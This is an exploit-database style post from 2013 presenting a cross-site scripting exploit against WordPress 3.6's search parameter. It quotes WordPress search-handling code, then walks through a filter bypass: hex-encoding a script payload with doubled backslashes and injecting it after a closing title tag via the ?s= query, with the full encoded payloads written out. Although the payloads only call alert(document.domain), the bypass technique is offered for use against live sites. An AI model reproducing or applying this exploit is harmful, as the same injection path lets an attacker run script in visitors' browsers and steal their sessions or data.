facebook facebook twitter rss

WordPress 3.6 XSS Exploit

Author: DamaneDz , Published: 17-09-2013
###########################################################################################
# Exploit Title: WordPress 3.6 XSS Exploit
# Author:DamaneDz
# Date: [2013-8-25]
# Tested on: AppServ (Win32) + Apache (Linux)
# How To Fix: Update To The Last Version 3.6.1
###########################################################################################

The Vuln File:

query.php

From The Line 2189 To 2213:

PHP Code:

if ( !empty($q['s']) ) {
// added slashes screw with quote grouping when done early, so done later
$q['s'] = stripslashes($q['s']);
if ( empty( $_GET['s'] ) && $this->is_main_query() )
$q['s'] = urldecode($q['s']);
if ( !empty($q['sentence']) ) {
$q['search_terms'] = array($q['s']);
} else {
preg_match_all('/".*?("|$)|((?<=[\r\n\t ",+])|^)[^\r\n\t ",+]+/', $q['s'], $matches);
$q['search_terms'] = array_map('_search_terms_tidy', $matches[0]);
}
$n = !empty($q['exact']) ? '' : '%';
$searchand = '';
foreach( (array) $q['search_terms'] as $term ) {
$term = esc_sql( like_escape( $term ) );
$search .= "{$searchand}(($wpdb->posts.post_title LIKE '{$n}{$term}{$n}') OR ($wpdb->posts.post_content LIKE '{$n}{$term}{$n}'))";
$searchand = ' AND ';
}
if ( !empty($search) ) {
$search = " AND ({$search}) ";
if ( !is_user_logged_in() )
$search .= " AND ($wpdb->posts.post_password = '') ";
}
}

iT Use Many Securing Functions Like:

stripslashes()
urldecode() // if The Attacker use url encode

so To ByPass That The Only Way is To Use Hex (i Mean encode Our Evil Code To Hex)
Like:

<script>alert(document.domain);</script>

After Encoding
\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3b\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e

But in The Line:2198

PHP Code:
$q['search_terms'] = array_map('_search_terms_tidy', $matches[0]);

(Array_Map) via (_search_terms_tidy) Function

We Will Take a Little Look For This Function Located on:functions.php

PHP Code:
function _search_terms_tidy($t) {
return trim($t, "\"'\n\r ");
}

so it Return our '\' From Our Hex Encoding Code To a String
That Mean we Didn't Do AnyThing
But i Found a Method is By Adding another '\' To Our Hex Code

\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3e\\x61\\x6c\\x65\\x72\\x74\\x28\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e\\x64\\x6f\\x6d\\x61\\x69\\x6e\\x29\\x3b\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e

and That iT For The ByPass
Now Exploiting WordPress:
This Will not Work Cause is not Encoding YeT
iT Just To Explain Something iF You Want To Change Exploiting Method

http://domain.tld/wp/?s=</title><script>alert(document.domain);</script>



Ques-: Why i Add (</title>) Before The Evil Code ??
Ans-: i Answer iT's Something That i've Found in The Source.
(another Method To Found XSS ;) i will Explain in another Day)

So Now All What we NeeD is To Encode This
</title><script>alert(document.domain);</script>

using Hex and Add \\x To Each 2 Strings
\\x3c\\x2f\\x74\\x69\\x74\\x6c\\x65\\x3e\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3e\\x61\\x6c\\x65\\x72\\x74\\x28\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e\\x64\\x6f\\x6d\\x61\\x69\\x6e\\x29\\x3b\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e

./DonE

Like us on Facebook :